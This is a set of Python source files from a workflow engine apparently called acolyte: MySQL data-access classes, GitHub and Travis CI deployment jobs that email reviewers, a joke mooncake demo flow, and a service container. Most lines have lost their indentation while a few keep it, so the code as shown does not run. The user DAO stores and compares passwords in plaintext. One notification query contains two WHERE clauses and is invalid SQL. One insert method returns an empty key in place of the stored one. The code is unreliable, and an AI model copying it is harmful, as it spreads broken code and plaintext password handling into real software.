# ======================================================================
# File: acolyte/core/storage/flow_template.py
# ======================================================================
import simplejson as json
from acolyte.core.flow import FlowTemplate
from acolyte.core.storage import AbstractDAO
def _mapper(result):
return FlowTemplate(
id_=result["id"],
flow_meta=result["flow_meta"],
name=result["name"],
bind_args=json.loads(result["bind_args"]),
max_run_instance=result["max_run_instance"],
config=json.loads(result["config"]),
creator=result["creator"],
created_on=result["created_on"]
)
class FlowTemplateDAO(AbstractDAO):
"""针对flow_template表的操作
"""
def __init__(self, db):
super().__init__(db)
def query_flow_template_by_id(self, template_id):
return self._db.query_one((
"select * from flow_template where id = %s"
), (template_id,), _mapper)
def query_flow_template_by_name(self, tpl_name):
return self._db.query_one((
"select * from flow_template where name = %s"
), (tpl_name,), _mapper)
def insert_flow_template(self, flow_meta, name, bind_args,
max_run_instance, config, creator, created_on):
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert into `flow_template` "
"(flow_meta, name, bind_args, max_run_instance, "
"config, creator, created_on) values ("
"%s, %s, %s, %s, %s, %s, %s)"
), (flow_meta, name, json.dumps(bind_args), max_run_instance,
json.dumps(config), creator, created_on))
conn.commit()
return FlowTemplate(
id_=csr.lastrowid,
flow_meta=flow_meta,
name=name,
bind_args=bind_args,
max_run_instance=max_run_instance,
config=config,
creator=creator,
created_on=created_on
)
def update_flow_template(self, flow_tpl_id, name,
bind_args, max_run_instance, config):
return self._db.execute((
"update flow_template set name = %s, bind_args = %s, "
"max_run_instance = %s, config = %s where id = %s limit 1"
), (name, json.dumps(bind_args), max_run_instance, json.dumps(config),
flow_tpl_id))
    def is_name_existed(self, name):
        return self._db.query_one_field((
            "select id from flow_template where name = %s limit 1"
        ), (name,))
def delete_by_id(self, tpl_id):
if isinstance(tpl_id, list):
holders = ",".join(("%s", ) * len(tpl_id))
return self._db.execute((
"delete from flow_template where id in ({holders})"
).format(holders=holders), tpl_id)
else:
return self._db.execute((
"delete from flow_template where id = %s"
), (tpl_id,))
def query_all_templates(self):
return self._db.query_all((
"select * from flow_template"
), tuple(), _mapper)
def query_by_flow_meta_name(self, flow_meta_name):
return self._db.query_all((
"select * from flow_template where "
"flow_meta = %s"
), (flow_meta_name, ), _mapper)
def query_by_id_list(self, tpl_id_list, to_dict=False):
if not tpl_id_list:
return [] if not to_dict else {}
holders = ",".join(("%s", ) * len(tpl_id_list))
rs = self._db.query_all((
"select * from flow_template where id in ({holders})"
).format(holders=holders), tpl_id_list, _mapper)
if to_dict:
return {t.id: t for t in rs}
        return rs


# ======================================================================
# File: acolyte/core/storage/job_action_data.py
# ======================================================================
import datetime
import simplejson as json
from acolyte.core.storage import AbstractDAO
from acolyte.core.job import JobActionData
def _mapper(result):
result["id_"] = result.pop("id")
result["arguments"] = json.loads(result["arguments"])
result["data"] = json.loads(result["data"])
return JobActionData(**result)
class JobActionDataDAO(AbstractDAO):
def __init__(self, db):
super().__init__(db)
def query_by_id(self, id_):
return self._db.query_one((
"select * from job_action_data "
"where id = %s"
), (id_,), _mapper)
def query_by_job_instance_id_and_action(self, job_instance_id, action):
return self._db.query_all((
"select * from job_action_data where "
"job_instance_id = %s and action = %s"
), (job_instance_id, action), _mapper)
def query_by_instance_id(self, job_instance_id):
return self._db.query_all((
"select * from job_action_data where "
"job_instance_id = %s"
), (job_instance_id, ), _mapper)
def query_by_flow_instance_id(
self, flow_instance_id, to_dict=False):
job_actions = self._db.query_all((
"select * from job_action_data where "
"flow_instance_id = %s"
), (flow_instance_id, ), _mapper)
if to_dict:
if not job_actions:
return {}
return {
job_action.action: job_action
for job_action in job_actions
}
else:
return job_actions
def query_by_data_key(self, job_instance_id, action, data_key):
return self._db.query_one((
"select * from job_action_data where "
"job_instance_id = %s and action = %s and "
"data_key = %s limit 1"
), (job_instance_id, action, data_key), _mapper)
def insert(self,
job_instance_id, action, actor, arguments, data_key, data):
now = datetime.datetime.now()
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert into job_action_data ("
"job_instance_id, action, actor, "
"arguments, data_key, data, created_on, updated_on)"
"values (%s, %s, %s, %s, %s, %s, %s, %s)"
), (job_instance_id, action, actor, json.dumps(arguments),
data_key, json.dumps(data), now, now))
conn.commit()
return JobActionData(
id_=csr.lastrowid,
job_instance_id=job_instance_id,
action=action,
actor=actor,
arguments=arguments,
data_key="",
data=data,
created_on=now,
updated_on=now
)
def update_data(self, action_data_id, data):
now = datetime.datetime.now()
return self._db.execute((
"update job_action_data set data = %s, "
"updated_on = %s "
"where id = %s"
), (json.dumps(data), now, action_data_id))
    def update_data_with_key(self, action_data_id, key, data):
        now = datetime.datetime.now()
        return self._db.execute((
            "update job_action_data set data_key = %s, "
            "data = %s, updated_on = %s where id = %s"
        ), (key, json.dumps(data), now, action_data_id))
def delete_by_id(self, job_action_data_id):
return self._db.execute((
"delete from job_action_data where id = %s"
), (job_action_data_id,))
def delete_by_job_instance_id(self, job_instance_id):
return self._db.execute((
"delete from job_action_data where job_instance_id = %s"
), (job_instance_id,))
def sync_updated_on(self, job_action_data_id):
return self._db.execute((
"update job_action_data set updated_on = now() "
"where id = %s limit 1"
        ), (job_action_data_id,))


# ======================================================================
# File: acolyte/core/storage/job_instance.py
# ======================================================================
import datetime
from acolyte.core.storage import AbstractDAO
from acolyte.core.job import JobInstance, JobStatus
def _mapper(result):
result["id_"] = result.pop("id")
return JobInstance(**result)
class JobInstanceDAO(AbstractDAO):
def __init__(self, db):
super().__init__(db)
def query_by_id(self, instance_id):
return self._db.query_one((
"select * from job_instance where id = %s"
), (instance_id,), _mapper)
def query_by_instance_id_and_step(self, instance_id, step):
return self._db.query_one((
"select * from job_instance where "
"flow_instance_id = %s and step_name = %s limit 1"
), (instance_id, step), _mapper)
def insert(self, flow_instance_id, step_name, job_name, trigger_actor):
now = datetime.datetime.now()
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert into job_instance ("
"flow_instance_id, step_name, job_name, "
"status, trigger_actor, "
"created_on, updated_on) values ("
"%s, %s, %s, %s, %s, %s, %s)"
), (flow_instance_id, step_name, job_name,
JobStatus.STATUS_RUNNING, trigger_actor, now, now))
conn.commit()
return JobInstance(
id_=csr.lastrowid,
flow_instance_id=flow_instance_id,
step_name=step_name,
job_name=job_name,
status=JobStatus.STATUS_RUNNING,
trigger_actor=trigger_actor,
created_on=now,
updated_on=now
)
def query_by_flow_instance_id(self, flow_instance_id):
return self._db.query_all((
"select * from job_instance where "
"flow_instance_id = %s"
), (flow_instance_id, ), _mapper)
def update_status(self, job_instance_id, status):
now = datetime.datetime.now()
return self._db.execute((
"update job_instance set status = %s, "
"updated_on = %s where id = %s limit 1"
), (status, now, job_instance_id))
def delete_by_flow_instance_id(self, flow_instance_id):
return self._db.execute((
"delete from job_instance where flow_instance_id = %s"
        ), (flow_instance_id,))


# ======================================================================
# File: acolyte/core/storage/user.py
# ======================================================================
import datetime
from acolyte.core.user import User
from acolyte.core.storage import AbstractDAO
def _mapper(result):
result.pop("password")
result["id_"] = result.pop("id")
return User(**result)
class UserDAO(AbstractDAO):
def __init__(self, db):
super().__init__(db)
def query_user_by_id(self, user_id):
return self._db.query_one((
"select * from user where id = %s"
), (user_id,), _mapper)
    def query_users_by_id_list(self, id_list, to_dict=False):
        """Batch-query users by a list of user IDs.
        """
        if not id_list:
            return {} if to_dict else []
        holders = ",".join(("%s", ) * len(id_list))
        users = self._db.query_all((
            "select * from user "
            "where id in ({holders})"
        ).format(holders=holders), id_list, _mapper)
if to_dict:
return {u.id: u for u in users}
return users
def is_email_exist(self, email):
return self._db.query_one(
"select id from user where email = %s", (email,))
def insert_user(self, email, password, name, role, github_account):
now = datetime.datetime.now()
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert into user ("
"email, password, name, role, github_account, "
"created_on, last_login_time) values ("
"%s, %s, %s, %s, %s, %s, %s)"
), (email, password, name, role, github_account, now, now))
conn.commit()
return User(csr.lastrowid,
email, name, role, github_account, now, now)
def delete_by_id(self, user_id):
if isinstance(user_id, list):
holders = ",".join(("%s", ) * len(user_id))
return self._db.execute(
"delete from user where id in ({holders})".format(
holders=holders), user_id)
else:
return self._db.execute(
"delete from user where id = %s", (user_id, ))
def query_user_by_email_and_password(self, email, password):
return self._db.query_one((
"select * from user "
"where email = %s and password = %s"
), (email, password), _mapper)
def query_user_password(self, user_id):
return self._db.query_one_field((
"select password from user "
"where id = %s limit 1"
), (user_id,))
def update_password(self, user_id, password):
return self._db.execute((
"update user set password = %s "
"where id = %s limit 1"
), (password, user_id))
def query_by_github_account(self, github_account):
return self._db.query_one((
"select * from user where "
"github_account = %s limit 1"
        ), (github_account, ), _mapper)


# ======================================================================
# File: acolyte/core/storage/notify_index.py
# ======================================================================
import datetime
import simplejson as json
from acolyte.core.storage import AbstractDAO
from acolyte.core.notify import (
NotifyIndex,
ReadStatus,
NotifyWay
)
_notify_ways = list(NotifyWay)
_read_status_list = list(ReadStatus)
def _mapper(row):
return NotifyIndex(
id_=row["id"],
notify_template=row["notify_template"],
receiver=row["receiver"],
subject_template_args=json.loads(row["subject_template_args"]),
content_template_args=json.loads(row["content_template_args"]),
digest_template_args=json.loads(row["digest_template_args"]),
notify_ways=json.loads(row["notify_ways"]),
read_status=_read_status_list[row["read_status"]],
updated_on=row["updated_on"],
created_on=row["created_on"]
)
class NotifyIndexDAO(AbstractDAO):
def __init__(self, db):
super().__init__(db)
def insert(self, notify_template, notify_receiver, notify_ways):
now = datetime.datetime.now()
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert into notify_index(notify_template, receiver, "
"subject_template_args, content_template_args, "
"digest_template_args, notify_ways, read_status, "
"updated_on, created_on) values ("
"%s, %s, %s, %s, %s, %s, %s, %s, %s)"
), (
notify_template,
notify_receiver.receiver_user.id,
json.dumps(notify_receiver.subject_template_args),
json.dumps(notify_receiver.content_template_args),
json.dumps(notify_receiver.digest_template_args),
json.dumps([way.value for way in notify_ways]),
ReadStatus.UNREAD.value,
now, now
))
conn.commit()
return NotifyIndex.from_notify_receiver(
id_=csr.lastrowid,
notify_template=notify_template,
notify_receiver=notify_receiver,
notify_ways=notify_ways
)
def query_by_id(self, id_):
return self._db.query_one((
"select * from notify_index where "
"id = %s limit 1"
), (id_, ), _mapper)
def query_unread(self, receiver_id):
return self._db.query_all((
"select * from notify_index where "
"receiver = %s and read_status = %s "
"order by created_on desc"
), (receiver_id, ReadStatus.UNREAD.value), _mapper)
def query_unread_num(self, receiver_id):
return self._db.query_one_field((
"select count(*) from notify_index "
"where receiver = %s and read_status = %s"
), (receiver_id, ReadStatus.UNREAD.value))
def query_by_receiver_id(self, receiver_id, offset_id, limit):
return self._db.query_all((
"select * from notify_index where "
"receiver = %s where id < %s order by id desc "
"limit %s"
), (receiver_id, offset_id, limit), _mapper)
def update_read_status(self, id_, read_status):
now = datetime.datetime.now()
return self._db.execute((
"update notify_index set read_status = %s, "
"updated_on = %s "
"where id = %s limit 1"
), (read_status, now, id_))
def update_read_status_by_receiver_id(self, receiver_id, read_status):
now = datetime.datetime.now()
return self._db.execute((
"update notify_index set read_status = %s, "
"updated_on = %s "
"where receiver = %s"
        ), (read_status, now, receiver_id))


# ======================================================================
# File: acolyte/core/storage/flow_instance_group.py
# ======================================================================
import datetime
from collections import defaultdict
from acolyte.util.json import to_json
from acolyte.core.storage import AbstractDAO
from acolyte.core.flow import FlowInstanceGroup
def _mapper(row):
row["id_"] = row.pop("id")
return FlowInstanceGroup(**row)
class FlowInstanceGroupDAO(AbstractDAO):
def __init__(self, db):
super().__init__(db)
def insert(self, name, description, meta, status):
now = datetime.datetime.now()
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert into flow_instance_group "
"(name, `description`, `meta`, status, "
"created_on, updated_on) values ("
"%s, %s, %s, %s, %s, %s)"
), (name, description, to_json(meta), status, now, now))
conn.commit()
return FlowInstanceGroup(
id_=csr.lastrowid,
name=name,
description=description,
meta=meta,
status=status,
created_on=now,
updated_on=now
)
def query_by_id(self, id_):
return self._db.query_one((
"select * from flow_instance_group where "
"id = %s limit 1"
), (id_, ), _mapper)
def query_by_id_list(self, id_list, to_dict=False):
if not id_list:
return {} if to_dict else []
holders = ",".join(("%s", ) * len(id_list))
rs = self._db.query_all((
"select * from flow_instance_group where "
"id in ({holders})"
).format(holders=holders), id_list, _mapper)
if to_dict:
return {g.id: g for g in rs}
return rs
def query_by_name(self, name):
return self._db.query_one((
"select * from flow_instance_group where "
"name = %s limit 1"
), (name, ), _mapper)
def query_by_datescope(self, begin_date, end_date):
return self._db.query_all((
"select * from flow_instance_group where "
"created_on between %s and %s"
), (begin_date, end_date), _mapper)
def update_status(self, id_, status):
now = datetime.datetime.now()
return self._db.execute((
"update flow_instance_group set status = %s, "
"updated_on = %s "
"where id = %s limit 1"
), (status, now, id_))
def delete(self, id_):
return self._db.execute((
"delete from flow_instance_group "
"where id = %s limit 1"
), (id_, ))
def query_all(self):
return self._db.query_all((
"select * from flow_instance_group"
), tuple(), _mapper)
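

# Illustrative usage sketch (not part of the original module): how a DAO built
# on the shared ConnectionPool is typically wired up and called. The connection
# settings, group name and status value below are assumptions; load_db_config
# and the DAO methods above are real parts of this codebase, and rows come back
# as domain objects because query_one/query_all apply the module-level _mapper.
def _example_group_dao_usage():
    from acolyte.util.db import load_db_config

    pool = load_db_config({"db": {
        "host": "localhost", "port": 3306, "user": "root",
        "password": "", "db": "easemob_flow"}})
    dao = FlowInstanceGroupDAO(pool)
    group = dao.insert(
        name="demo_group", description="sketch only",
        meta={}, status="running")        # "running" is an assumed status value
    return dao.query_by_id(group.id)      # mapped back to a FlowInstanceGroup
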
class FlowInstanceGroupRelationDAO(AbstractDAO):
def __init__(self, db):
super().__init__(db)
def insert(self, flow_instance_id, group_id):
now = datetime.datetime.now()
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert ignore into flow_instance_group_relation "
"(flow_instance_id, group_id, created_on) "
"values (%s, %s, %s)"
), (flow_instance_id, group_id, now))
conn.commit()
def is_in_group(self, flow_instance_id, group_id):
return self._db.query_one_field((
"select id from flow_instance_group_relation where "
"flow_instance_id = %s and group_id = %s"
), (flow_instance_id, group_id))
def query_group_id_by_instance_id(self, flow_instance_id):
return self._db.query_one_field((
"select group_id from flow_instance_group_relation "
"where flow_instance_id = %s"
), (flow_instance_id, ))
def query_instance_id_lst_by_group_id(self, group_id):
rs = self._db.query_all((
"select flow_instance_id from "
"flow_instance_group_relation where "
"group_id = %s"
), (group_id,))
if not rs:
return []
return [row["flow_instance_id"] for row in rs]
def query_by_group_id_list(self, group_id_list):
if not group_id_list:
return {}
holders = ",".join(("%s", ) * len(group_id_list))
rs = self._db.query_all((
"select flow_instance_id, group_id from "
"flow_instance_group_relation where "
"group_id in ({holders})"
).format(holders=holders), group_id_list)
if not rs:
return {}
groupby_rs = defaultdict(list)
for row in rs:
groupby_rs[row["group_id"]].append(row["flow_instance_id"])
return groupby_rs
def query_group_ids_by_instance_ids(self, instance_ids):
if not instance_ids:
return {}
holders = ",".join(("%s", ) * len(instance_ids))
rs = self._db.query_all((
"select group_id, flow_instance_id from "
"flow_instance_group_relation where "
"flow_instance_id in ({holders})"
).format(holders=holders), instance_ids)
return {r["flow_instance_id"]: r["group_id"] for r in rs}
def delete_by_group_id(self, group_id):
return self._db.execute((
"delete from flow_instance_group_relation "
"where group_id = %s"
        ), (group_id, ))


# ======================================================================
# File: acolyte/builtin_ext/github.py
# ======================================================================
import datetime
from acolyte.core.job import (
AbstractJob,
JobRef,
action_args,
ActionArg,
Decision,
DecisionOption,
Jinja2DetailsPageUI,
)
from acolyte.util.time import common_fmt_dt
from acolyte.util.validate import Field, StrField
from acolyte.core.flow import FlowMeta
from acolyte.util.mail import send_mail
from acolyte.ui import Button
from jinja2 import Environment, PackageLoader
jinja2_env = Environment(
loader=PackageLoader('acolyte.builtin_ext', 'github_ui'))
email_template = jinja2_env.get_template("mail_template.html")
def _get_decision_url(context, decision_name):
decision_url = (
"http://{host}/job/instance/{instance_id}"
"/decision/{decision_name}"
).format(
host=context.config["host"],
instance_id=context.job_instance_id,
decision_name=decision_name
)
return decision_url
def _get_flow_instance_url(context):
flow_instance_url = (
"http://{host}/flow/instance/{instance_id}"
).format(
host=context.config["host"],
instance_id=context.flow_instance_id
)
return flow_instance_url
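

# Illustrative sketch (not part of the original module): the URLs produced by
# the two helpers above. The context object is a stand-in exposing only the
# fields the helpers read; the host and ids are made-up values.
def _example_urls():
    class _Ctx:
        config = {"host": "acolyte.example.com"}
        job_instance_id = 42
        flow_instance_id = 7

    ctx = _Ctx()
    # -> "http://acolyte.example.com/job/instance/42/decision/deploy_sandbox"
    decision_url = _get_decision_url(ctx, "deploy_sandbox")
    # -> "http://acolyte.example.com/flow/instance/7"
    flow_url = _get_flow_instance_url(ctx)
    return decision_url, flow_url
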
class GithubPushJob(AbstractJob):
"""接受github push事件
"""
def __init__(self):
super().__init__(
name="github_push",
description=(
"This job could handle github push event."
)
)
@action_args(
ActionArg(
Field("hook_data", type_=dict, required=True),
mark=ActionArg.MARK_AUTO, comment="github hook 接收的数据"),
)
def on_trigger(self, context, hook_data):
"""
:param hook_data: Github hook返回的数据
"""
        # the data structure to be saved:
"""
{
"ref": "refs/heads/master",
"commits": [
{
"id": ...,
"message": ...,
"time": ...,
"committer": {
"name": "chihz",
"email": "[email protected]",
},
"added": [
],
"removed": [
],
"modified": [
"README.md"
]
}
],
"pusher": {
"name": "chihongze",
"email": "[email protected]"
}
}
"""
saved_data = {
"ref": hook_data["ref"],
"commits": [{
"id": commit["id"],
"message": commit["message"],
"time": commit["timestamp"],
"commiter": commit["committer"],
"added": commit["added"],
"removed": commit["removed"],
"modified": commit["modified"]
} for commit in hook_data["commits"]],
"pusher": hook_data["pusher"]
}
context.save(saved_data)
context.finish()
class TravisCIJob(AbstractJob):
"""处理Travis CI的构建
"""
def __init__(self):
super().__init__(
name="travis",
description="收集travis ci的执行结果",
ui=Jinja2DetailsPageUI(jinja2_env, "travis_build.html")
)
# 只有当travis构建成功并且代码review也成功的时候该Job才会完成
self._check_code_barrier = ["build_finish", "code_review"]
def on_trigger(self, context):
"""触发时记录只记录构建的开始时间
"""
context.save({"begin_time": common_fmt_dt(datetime.datetime.now())})
@action_args(
ActionArg(
Field("build_result", type_=int, required=True),
mark=ActionArg.MARK_AUTO,
comment="Travis CI构建结果 0 - 成功, 1 - 失败"
),
ActionArg(
Field("test_result", type_=dict, required=True),
mark=ActionArg.MARK_AUTO, comment="测试结果"
),
ActionArg(
Field("findbug_result", type_=dict, required=True),
mark=ActionArg.MARK_AUTO, comment="findbugs检查结果"
),
ActionArg(
Field("jar_file_name", type_=str, required=False),
mark=ActionArg.MARK_AUTO, comment="Jar包文件名称"
),
ActionArg(
Field("jar_base64", type_=str, required=False),
mark=ActionArg.MARK_AUTO, comment="Jar包文件的BASE64编码"
)
)
def on_build_finish(
self, context, build_result, test_result, findbug_result,
jar_file_name, jar_base64):
"""当TravisCI构建完成后执行此动作
:param build_result: 构建结果,即TRAVIS_TEST_RESULT
:param test_result: 测试结果 [
{
"testsuite": "chihz.bot.elder.ElderServiceTestCase",
"skipped": 0,
"failures": 1,
"errors": 0,
"testcases": [
{
"name":
"chihz.bot.elder.ElderServiceTestCase.testAnswerQuestion",
"status": "failure",
"failure_type": "org.junit.ComparisonFailure",
"traceback": ...
},
]
},
...
]
:param findbug_result: [
{
"bug_type": "DM_BOXED_PRIMITIVE_FOR_PARSING",
"bug_category": "performance",
"bug_description":
"Comparison of String parameter using == or != in",
"details": "xxxx"
}
]
:param jar_file_name: jar包文件名
:param jar_base64: jar包文件的base64编码
"""
# 处理构建成功
if build_result == 0:
jar_download_url = "http://{base_url}/{jar_file_name}".format(
base_url=context.config["jar_download_base_url"],
jar_file_name=jar_file_name
)
context.save({
"build_result": build_result,
"test_result": test_result,
"findbug_result": findbug_result,
"jar_download_url": jar_download_url
})
context["jar_download_url"] = jar_download_url
context.finish(waiting_for=self._check_code_barrier)
# 处理构建失败
else:
context.save({
"build_result": build_result,
"test_result": test_result,
"findbug_result": findbug_result,
})
context.failure() # 终止整个流程
@action_args(
ActionArg(
Field("code_review_result",
required=False, type_=bool, value_of=bool, default=False),
mark=ActionArg.MARK_AUTO,
comment="代码review结果"
)
)
def on_code_review(self, context, code_review_result):
if code_review_result:
context.finish(waiting_for=self._check_code_barrier)
else:
context.failure() # 不通过会终止整个工作流
class SandboxJob(AbstractJob):
"""部署到测试沙箱
"""
def __init__(self):
super().__init__(
name="sandbox",
description="该Job可以将Jar包部署到Sandbox",
decisions=[
Decision(
"do_deploy", "部署到沙箱", "部署当前版本到沙箱",
DecisionOption("deploy", "执行自动部署脚本")
),
Decision(
"deploy_sandbox", "反馈部署结果", "当前是否可以部署到沙箱?",
DecisionOption("agree", "可以部署"),
DecisionOption("disagree", "无法部署")
),
],
auto_trigger=True
)
def on_trigger(self, context):
"""被触发之后会先给运维发个邮件
"""
sandbox_deployer_email = context.config["sandbox_deployer_email"]
flow_details_url = _get_flow_instance_url(context)
decision_url = _get_decision_url(context, "deploy_sandbox")
send_mail(
receiver=sandbox_deployer_email,
subject="有新的版本需要您部署到沙箱",
content=email_template.render(
prompt="有新的版本需要您部署到沙箱,请您执行部署之后反馈部署结果,谢谢 : )",
buttons=(
Button("查看流程", flow_details_url),
Button("反馈部署结果", decision_url)
)
)
)
def on_deploy(self, context):
...
@action_args(
ActionArg(
StrField("test_service_url", required=True),
mark=ActionArg.MARK_AUTO, comment="部署完毕后的测试地址"
)
)
def on_agree(self, context, test_service_url):
"""当同意部署的时候会触发该事件,调用运维的接口自动部署到沙箱环境
"""
context.save({"test_service_url": test_service_url})
context["test_service_url"] = test_service_url
context.finish()
@action_args(
ActionArg(StrField("reason", required=True),
mark=ActionArg.MARK_AUTO, comment="不同意部署的原因")
)
def on_disagree(self, context, reason):
"""不同意部署,会产生一个原因
"""
context.save({"reason": reason})
context.failure()
class IntegrationTestJob(AbstractJob):
"""集成测试
"""
def __init__(self):
super().__init__(
name="integration_test",
description=(
"job for integration test"
),
decisions=(
Decision(
"do_test", "执行集成测试", "运行集成测试用例",
DecisionOption("test", "执行测试"),),
Decision(
"test_result", "反馈测试结果", "集成测试结果反馈",
DecisionOption("pass", "测试通过"),
DecisionOption("failure", "有点问题")
),
),
auto_trigger=True
)
def on_trigger(self, context):
qa_email = context.config["qa_email"]
decision_url = _get_decision_url(context, "test_result")
flow_instance_url = _get_flow_instance_url(context)
send_mail(
receiver=qa_email,
subject="沙箱中有新的版本需要测试了",
content=email_template.render(
prompt="沙箱中有新的版本需要测试,请您测试之后反馈结果,谢谢: )",
buttons=(
Button("查看流程", flow_instance_url),
Button("反馈测试结果", decision_url)
)
)
)
def on_test(self, context):
pass
def on_pass(self, context):
"""测试通过
"""
context.save({
"test_result": "success"
})
context.finish()
@action_args(
ActionArg(
StrField("reason", required=True),
mark=ActionArg.MARK_AUTO, comment="测试不通过的原因"
)
)
def on_failure(self, context, reason):
"""测试失败
"""
context.save({
"test_result": "failure",
"reason": reason
})
context.failure()
class MergeToMasterJob(AbstractJob):
def __init__(self):
super().__init__(
name="merge_to_master",
description=(
"merge dev branch to master"
),
auto_trigger=True
)
def on_trigger(self, context):
# TODO Call github api
context.finish()
class DeployJob(AbstractJob):
def __init__(self):
super().__init__(
name="deploy",
description=(
"job for deploying to online server"
),
auto_trigger=True,
decisions=[
Decision(
"do_deploy", "部署到线上", "部署到线上",
DecisionOption("deploy", "部署到线上"),
),
Decision(
"deploy_result", "反馈部署结果", "部署结果反馈",
DecisionOption("success", "部署成功"),
DecisionOption("failure", "部署失败")
)
]
)
def on_trigger(self, context):
deployer_email = context.config["deployer_email"]
flow_instance_url = _get_flow_instance_url(context)
send_mail(
receiver=deployer_email,
subject="有新工程需要部署",
content=email_template.render(
prompt="有新的工程需要您部署,部署完毕后请反馈部署结果,谢谢: )",
buttons=(
Button("查看流程", flow_instance_url),
)
)
)
def on_deploy(self, context):
...
def on_success(self, context):
context.finish()
def on_failure(self, context):
context.failure()
class CommonGithubFlowMeta(FlowMeta):
def __init__(self):
super().__init__(
name="common_github_flow",
description="常规的个人github项目流程",
jobs=(
# 接受github push
JobRef("github_push"),
# 处理TravisCI的构建结果
JobRef("travis"),
# 部署到沙箱
JobRef("sandbox"),
# 进行集成测试
JobRef("integration_test"),
# merge到master分支
JobRef("merge_to_master"),
# 部署到线上
JobRef("deploy")
)
)
def on_start(self, context):
...
def on_failure(self, context):
...
def on_finish(self, context):
...
def on_discard(self, context):
        ...


# ======================================================================
# File: acolyte/builtin_ext/mooncake.py
# ======================================================================
from acolyte.core.job import (
AbstractJob,
ActionArg,
JobRef,
action_args,
Jinja2DetailsPageUI,
Decision,
DecisionOption
)
from jinja2 import Environment, PackageLoader
from acolyte.core.flow import FlowMeta
from acolyte.core.service import Result
from acolyte.util.validate import IntField, StrField
jinja2_env = Environment(
loader=PackageLoader('acolyte.builtin_ext', 'mooncake_ui'))
class ProgrammerJob(AbstractJob):
def __init__(self):
super().__init__(
name="programmer",
description=(
"我是一个程序员,"
"我的爱好是抢月饼!"
),
ui=Jinja2DetailsPageUI(jinja2_env, "programmer.html")
)
def on_trigger(self, context):
"""程序员出场
"""
return Result.ok(data="好吧,我要开始加班还房贷了")
@action_args(
ActionArg(
IntField("cake_num", required=False, default=1, min_=1),
mark=ActionArg.MARK_AUTO, comment="抢到的月饼数目"
)
)
def on_midautumn(self, context, cake_num):
context.finish()
return Result.ok(data="我抢了{cake_num}个月饼".format(cake_num=cake_num))
class HRJob(AbstractJob):
def __init__(self):
super().__init__(
name="hr",
description=(
"我是一个HR,"
"我专门跟抢月饼的程序员过不去。"
),
auto_trigger=True
)
def on_trigger(self, context):
return Result.ok(data="刚才好像有人抢了月饼")
@action_args(
ActionArg(
StrField("who", required=True, regex=r'^\w+$'),
mark=ActionArg.MARK_AUTO,
comment="抢月饼的人"
)
)
def on_found(self, context, who):
context.finish()
return Result.ok(data="是{who}在抢月饼,我要去报告老板!".format(who=who))
class BossJob(AbstractJob):
def __init__(self):
super().__init__(
name="boss",
description=(
"我是老板,"
"我的心情即公司价值观"
),
decisions=[
Decision(
"handle_employee", "如何处理员工?",
DecisionOption("fire_him", "开除他!"),
DecisionOption("nice_mood", "没多大事,留下他吧。")
),
],
auto_trigger=True
)
def on_trigger(self, context):
return Result.ok(data="这个世界不是因为你能做什么,而是你该做什么。")
@action_args(
ActionArg(
StrField("mood", required=True),
mark=ActionArg.MARK_AUTO,
comment="老板心情",
)
)
def on_hr_report(self, context, mood):
if mood == "好":
context.finish()
return Result.ok(data="Geek文化嘛,多大点儿事")
else:
context.failure()
return Result.ok(data="不诚信,违反价值观,严肃处理")
@action_args(
ActionArg(
StrField("reason", required=True),
mark=ActionArg.MARK_AUTO,
comment="开除原因"
)
)
def on_fire_him(self, context, reason):
context.failure()
return Result.ok(data="开除此员工,因为:{}".format(reason))
def on_nice_mood(self, context):
context.finish()
context.save({"boos_think": "Geek文化嘛,多大点儿事"})
return Result.ok(data="Geek文化嘛,多大点儿事")
class MooncakeFlowMeta(FlowMeta):
def __init__(self):
super().__init__(
name="mooncake_flow",
description="抢月饼flow",
jobs=(
JobRef(
step_name="programmer",
job_name="programmer"
),
JobRef(
step_name="hr",
job_name="hr"
),
JobRef(
step_name="boss",
job_name="boss"
)
)
)
def on_start(self, context):
...
def on_failure(self, context):
...
def on_finish(self, context):
        ...


# ======================================================================
# File: acolyte/util/service_container.py
# ======================================================================
from acolyte.exception import (
EasemobFlowException,
ObjectAlreadyExistedException,
ObjectNotFoundException,
InvalidArgumentException
)
from acolyte.util import log
from acolyte.util.lang import get_full_class_name
from acolyte.core.service import AbstractService
class ServiceContainer:
"""所有服务性质的对象都可以通过该容器去注册,
可以通过该容器来获取需要依赖的服务
"""
def __init__(self):
self._container = {}
def register(self, service_id, service_obj,
init_callback=None, lazy=False, finalize=None):
"""将服务对象注册到容器
:param service_id: 服务对象标识,要求系统全局唯一
:param service_obj: 服务对象,可以是函数,模块或者其它什么东西,依赖者知道就行。
:param init_callback: 初始化函数
:param lazy: 是否是懒加载
"""
if service_id in self._container:
raise ObjectAlreadyExistedException(service_id)
service_defination = ServiceDefination(
service_id, service_obj, init_callback, lazy, finalize)
if not lazy:
service_defination.init()
self._container[service_id] = service_defination
log.acolyte.debug((
"register service {service_id} -> {service_class} to container"
).format(service_id=service_id,
service_class=get_full_class_name(service_obj.__class__)))
def register_service(
self, service_class,
init_callback=None, lazy=False, finalize=None):
"""该方法专门用于facade服务对象的注册
:param service_class: 服务对象类型
:param init_callback: 初始化函数
:param lazy: 是否是懒加载
"""
if not issubclass(service_class, AbstractService):
raise InvalidArgumentException(
"the service class must be the subclass of AbstractService")
self.register(
service_id=service_class.__name__,
service_obj=service_class(self),
init_callback=init_callback,
lazy=lazy,
finalize=finalize
)
def get_service(self, service_id):
"""从容器中获取服务
:param service_id: 服务对象标识
"""
if service_id not in self._container:
raise ObjectNotFoundException(service_id)
service_define = self._container[service_id]
if not service_define.has_inited():
service_define.init()
return service_define.service_obj
def after_register(self):
for service in self._container.values():
service.after_register()
def finalize(self):
for defination in self._container.values():
if defination.finalize is not None:
defination.finalize()
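

# Illustrative sketch (not part of the original module): registering a plain
# object and resolving it later. The service id and callbacks are made up; for
# facade services the bootstrap modules call register_service(FlowService) etc.
def _example_container_usage():
    container = ServiceContainer()
    closed = []
    container.register(
        service_id="demo_cache",
        service_obj={},                          # any object can act as a service
        init_callback=lambda obj: obj.update(ready=True),
        finalize=lambda: closed.append(True))    # invoked by container.finalize()
    cache = container.get_service("demo_cache")  # -> {"ready": True}
    container.finalize()
    return cache, closed
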
